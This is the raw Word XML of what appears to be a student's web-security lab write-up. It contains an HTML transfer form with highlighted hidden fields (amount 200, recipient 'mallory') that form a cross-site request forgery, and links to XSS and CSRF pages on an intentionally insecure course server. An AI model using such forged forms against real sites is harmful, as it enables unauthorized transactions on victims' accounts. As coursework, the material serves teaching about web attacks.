    <w:p w14:paraId="3354505F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&lt;option value='0'&gt;$0&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C27C6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&lt;option value='20'&gt;$20&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AEB9E9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&lt;option value='40'&gt;$40&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EF777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&lt;option value='60'&gt;$60&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E083F36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&lt;option value='80'&gt;$80&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DD02F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&lt;option value='100'&gt;$100&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8858C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&lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058829F9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3BEEE54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to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC9E12F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1D0ABA8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&lt;select name='to'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D560EDE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 xml:space="preserve">    &lt;option value=''&gt;----- select one -----&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29853564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>&lt;option value='egoists'&gt;Egoists Anonymous&lt;/option&gt;&lt;option value='redundancy'&gt;The Society for Redundancy Society&lt;/option&gt;&lt;option value='yacht'&gt;The Help Me Fix My Yacht Kickstarter&lt;/option&gt;&lt;option value='vagueness'&gt;Vagueness or Something Association&lt;/option&gt;&lt;option value='apostrophe'&gt;Misplaced Apostrophe's Anonymous&lt;/option&gt;&lt;option value='mediocrity'&gt;International Mediocrity Foundation&lt;/option&gt;&lt;option value='utopia'&gt;Utopians For A Better Society&lt;/option&gt;&lt;option value='fame'&gt;Fame Seekers Anonymous&lt;/option&gt;&lt;option value='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>codep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'&gt;Codependency Cooperative&lt;/option&gt;&lt;option value='moon'&gt;The Flat Moon Society&lt;/option&gt;    &lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E0688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>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D7B02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BD4A8E9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>&lt;input type='hidden' name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' value='123456789'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860BA6C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1DCC1E2" w14:textId="77777777" w:rsidR="00321523" w:rsidRPr="00BA7607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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;input type="hidden" name="amount" value="200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D06F695" w14:textId="77777777" w:rsidR="00321523" w:rsidRPr="00BA7607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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="hidden" name="to" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E9928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BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">       value="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mallory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B66413" w14:textId="77777777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2E238DA" w14:textId="652A3738" w:rsidR="00321523" w:rsidRPr="005B1641" w:rsidRDefault="00321523" w:rsidP="0032152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41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;input type="submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01163713" w14:textId="77777777" w:rsidR="00880A9F" w:rsidRDefault="00880A9F" w:rsidP="00AC724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F8A6436" w14:textId="77777777" w:rsidR="00AB1135" w:rsidRPr="00F00CD3" w:rsidRDefault="00AB1135" w:rsidP="00AC724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sectPr w:rsidR="00AB1135" w:rsidRPr="00F0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5E"/>
    <w:rsid w:val="000411EE"/>
    <w:rsid w:val="000F6FCC"/>
    <w:rsid w:val="00271EB0"/>
    <w:rsid w:val="00276DBA"/>
    <w:rsid w:val="00321523"/>
    <w:rsid w:val="00332CE7"/>
    <w:rsid w:val="003420DE"/>
    <w:rsid w:val="00365D9E"/>
    <w:rsid w:val="003C7FFC"/>
    <w:rsid w:val="003F2F09"/>
    <w:rsid w:val="004C7DB0"/>
    <w:rsid w:val="005439FD"/>
    <w:rsid w:val="005B01F4"/>
    <w:rsid w:val="005B1641"/>
    <w:rsid w:val="0066454B"/>
    <w:rsid w:val="00730769"/>
    <w:rsid w:val="0085335D"/>
    <w:rsid w:val="00880A9F"/>
    <w:rsid w:val="008F7E67"/>
    <w:rsid w:val="00913622"/>
    <w:rsid w:val="00AA15D9"/>
    <w:rsid w:val="00AB1135"/>
    <w:rsid w:val="00AC724A"/>
    <w:rsid w:val="00AF0EF3"/>
    <w:rsid w:val="00B11099"/>
    <w:rsid w:val="00B1285E"/>
    <w:rsid w:val="00BA7607"/>
    <w:rsid w:val="00BB2EC5"/>
    <w:rsid w:val="00BC1DDD"/>
    <w:rsid w:val="00D756E9"/>
    <w:rsid w:val="00E81349"/>
    <w:rsid w:val="00F00CD3"/>
    <w:rsid w:val="00F14B6B"/>
    <w:rsid w:val="00F46FFE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6C3C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{78CBB06C-04FF-4C77-A136-2FE7E6B0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85E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="000F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4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meda.cs.virginia.edu/~insecure/xss.php?userid=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dromeda.cs.virginia.edu/~insecure/xss.php" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/csrf.php?csrf_token=123456789&amp;amount=200&amp;to=mall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romeda.cs.virginia.edu/~insecure/xss.php?name=" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/csrf.php?amount=200&amp;to=mallory" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?name=" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?name=" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?userid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Kim, Tyler Yosep (tkj9ep)</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-26T02:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-27T20:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>